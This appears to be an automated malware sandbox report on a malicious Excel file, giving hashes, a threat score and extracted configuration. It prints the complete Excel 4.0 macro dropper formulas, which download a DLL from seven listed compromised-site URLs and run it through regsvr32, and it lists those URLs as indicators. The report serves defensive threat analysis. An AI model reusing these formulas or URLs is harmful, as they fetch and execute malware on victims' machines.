General

  • Target

    a56944871d95aecf27e77c6262f002d44e1fb3165214faad085948de98e46c3f

  • Size

    20KB

  • Sample

    241111-wsa57atbmc

  • MD5

    bb81f2a0f22a048d07799945931ab8ec

  • SHA1

    0c814100efe4675ce01ab4df4787d64ba46d1ce3

  • SHA256

    a56944871d95aecf27e77c6262f002d44e1fb3165214faad085948de98e46c3f

  • SHA512

    1507d4117648434128feed29df17ffa87e7d55d23cb038a612682c0d50ec883ffd10ed8672622009c0741e277ef2489f5629e5e6f4ad578e979a10b7e78a06f0

  • SSDEEP

    384:+JaVb1GNjImo4CGzPd6ZIwwSKb5CzgObff9kC+xbX7Fg7a:EiIN3o4FLTCBn9kC+xbLF1

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://banrai.ac.th/website/IHI0iNLLWDh9P/

http://bangsoe.dk/__backup/JON6L/

http://bahr.se/tvillingar2-filer/0wFIrmZ70Vl/

https://barkstage.es/wp-content/S0Q/

https://aquinoabogados.com.ar/newsletter/Zm7prnrQ55D1hrHqDC/

http://ceibadiseno.com.mx/bandermex2/6a6wGJmNwx8/

https://www.manchesterot.co.uk/about-us/LFXAJJIa/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://banrai.ac.th/website/IHI0iNLLWDh9P/","..\kytk.dll",0,0)
    =IF('SCWVCV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bangsoe.dk/__backup/JON6L/","..\kytk.dll",0,0))
    =IF('SCWVCV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bahr.se/tvillingar2-filer/0wFIrmZ70Vl/","..\kytk.dll",0,0))
    =IF('SCWVCV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://barkstage.es/wp-content/S0Q/","..\kytk.dll",0,0))
    =IF('SCWVCV'!D20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://aquinoabogados.com.ar/newsletter/Zm7prnrQ55D1hrHqDC/","..\kytk.dll",0,0))
    =IF('SCWVCV'!D22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ceibadiseno.com.mx/bandermex2/6a6wGJmNwx8/","..\kytk.dll",0,0))
    =IF('SCWVCV'!D24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.manchesterot.co.uk/about-us/LFXAJJIa/","..\kytk.dll",0,0))
    =IF('SCWVCV'!D26<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\kytk.dll")
    =RETURN()

Extracted

Language: xlm4.0

    Source          URL
    xlm40.dropper   https://banrai.ac.th/website/IHI0iNLLWDh9P/
    xlm40.dropper   http://bangsoe.dk/__backup/JON6L/
    xlm40.dropper   http://bahr.se/tvillingar2-filer/0wFIrmZ70Vl/
    xlm40.dropper   https://barkstage.es/wp-content/S0Q/
    xlm40.dropper   https://aquinoabogados.com.ar/newsletter/Zm7prnrQ55D1hrHqDC/
    xlm40.dropper   http://ceibadiseno.com.mx/bandermex2/6a6wGJmNwx8/
    xlm40.dropper   https://www.manchesterot.co.uk/about-us/LFXAJJIa/


MITRE ATT&CK Enterprise v15